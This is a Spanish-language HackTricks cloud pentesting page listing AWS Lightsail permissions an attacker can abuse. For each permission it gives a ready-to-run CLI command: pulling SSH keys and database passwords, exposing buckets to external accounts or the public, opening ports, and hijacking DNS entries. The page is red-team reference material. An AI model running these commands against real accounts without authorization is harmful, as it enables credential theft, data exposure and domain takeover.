AWS - Lightsail Privesc

Tip

Aprende y practica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Aprende y practica Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Apoya a HackTricks

• Consulta los subscription plans!
• Únete al 💬 Discord group o al telegram group o síguenos en Twitter 🐦 @hacktricks_live.
• Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud github repos.

Lightsail

For more information about Lightsail check:

AWS - Lightsail Enum

Warning

Es importante notar que Lightsail no utiliza IAM roles pertenecientes al usuario sino una cuenta gestionada por AWS, por lo que no puedes abusar de este servicio para privesc. Sin embargo, datos sensibles como code, API keys y database info podrían encontrarse en este servicio.

lightsail:DownloadDefaultKeyPair

Este permiso te permitirá obtener las claves SSH para acceder a las instancias:

aws lightsail download-default-key-pair

Impacto potencial: Encontrar información sensible dentro de las instancias.

lightsail:GetInstanceAccessDetails

Este permiso te permitirá generar claves SSH para acceder a las instancias:

aws lightsail get-instance-access-details --instance-name <instance_name>

Impacto potencial: Encontrar información sensible dentro de las instancias.

lightsail:CreateBucketAccessKey

Este permiso te permitirá obtener una clave para acceder al bucket:

aws lightsail create-bucket-access-key --bucket-name <name>

Impacto potencial: Encontrar información sensible dentro del bucket.

lightsail:GetRelationalDatabaseMasterUserPassword

Este permiso te permitirá obtener las credenciales para acceder a la base de datos:

aws lightsail get-relational-database-master-user-password --relational-database-name <name>

Impacto potencial: Encontrar información sensible dentro de la base de datos.

lightsail:UpdateRelationalDatabase

Este permiso permite cambiar la contraseña para acceder a la base de datos:

aws lightsail update-relational-database --relational-database-name <name> --master-user-password <strong_new_password>

Si la base de datos no es pública, también podrías hacerla pública con estos permisos:

aws lightsail update-relational-database --relational-database-name <name> --publicly-accessible

Impacto potencial: Encontrar información sensible dentro de la base de datos.

lightsail:OpenInstancePublicPorts

Este permiso permite abrir puertos en Internet

aws lightsail open-instance-public-ports \
--instance-name MEAN-2 \
--port-info fromPort=22,protocol=TCP,toPort=22

Impacto potencial: Acceso a puertos sensibles.

lightsail:PutInstancePublicPorts

Este permiso permite abrir puertos a Internet. Ten en cuenta que la llamada cerrará cualquier puerto abierto que no esté especificado en ella.

aws lightsail put-instance-public-ports \
--instance-name MEAN-2 \
--port-infos fromPort=22,protocol=TCP,toPort=22

Impacto potencial: Acceso a puertos sensibles.

lightsail:SetResourceAccessForBucket

Este permiso permite dar a una instancia acceso a un bucket sin credenciales adicionales.

aws set-resource-access-for-bucket \
--resource-name <instance-name> \
--bucket-name <bucket-name> \
--access allow

Impacto potencial: Posible nuevo acceso a buckets con información sensible.

lightsail:UpdateBucket

Con este permiso, un atacante podría otorgar a su propia cuenta de AWS acceso de lectura a buckets o incluso hacer que los buckets sean públicos para todo el mundo:

# Grant read access to exterenal account
aws update-bucket --bucket-name <value> --readonly-access-accounts <external_account>

# Grant read to the public
aws update-bucket --bucket-name <value> --access-rules getObject=public,allowPublicOverrides=true

# Bucket private but single objects can be public
aws update-bucket --bucket-name <value> --access-rules getObject=private,allowPublicOverrides=true

Potential Impact: Acceso potencial nuevo a buckets con información sensible.

lightsail:UpdateContainerService

Con este permiso, un atacante podría conceder acceso a ECRs privados desde el servicio de contenedores.

aws update-container-service \
--service-name <name> \
--private-registry-access ecrImagePullerRole={isActive=boolean}

Impacto potencial: Obtener información sensible de ECR privado

lightsail:CreateDomainEntry

Un atacante con este permiso podría crear un subdominio y apuntarlo a su propia dirección IP (subdomain takeover), o crear un registro SPF que le permita spoof emails desde el dominio, o incluso configurar el dominio principal apuntando a su propia dirección IP.

aws lightsail create-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

Impacto potencial: Toma de control de un dominio

lightsail:UpdateDomainEntry

Un atacante con este permiso podría crear subdominios y apuntarlos a su propia dirección IP (subdomain takeover), o crear un registro SPF que le permita falsificar correos electrónicos desde el dominio, o incluso configurar el dominio principal para que apunte a su propia dirección IP.

aws lightsail update-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

Impacto potencial: Tomar control de un dominio

Tip

Aprende y practica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Aprende y practica Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Apoya a HackTricks

• Consulta los subscription plans!
• Únete al 💬 Discord group o al telegram group o síguenos en Twitter 🐦 @hacktricks_live.
• Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud github repos.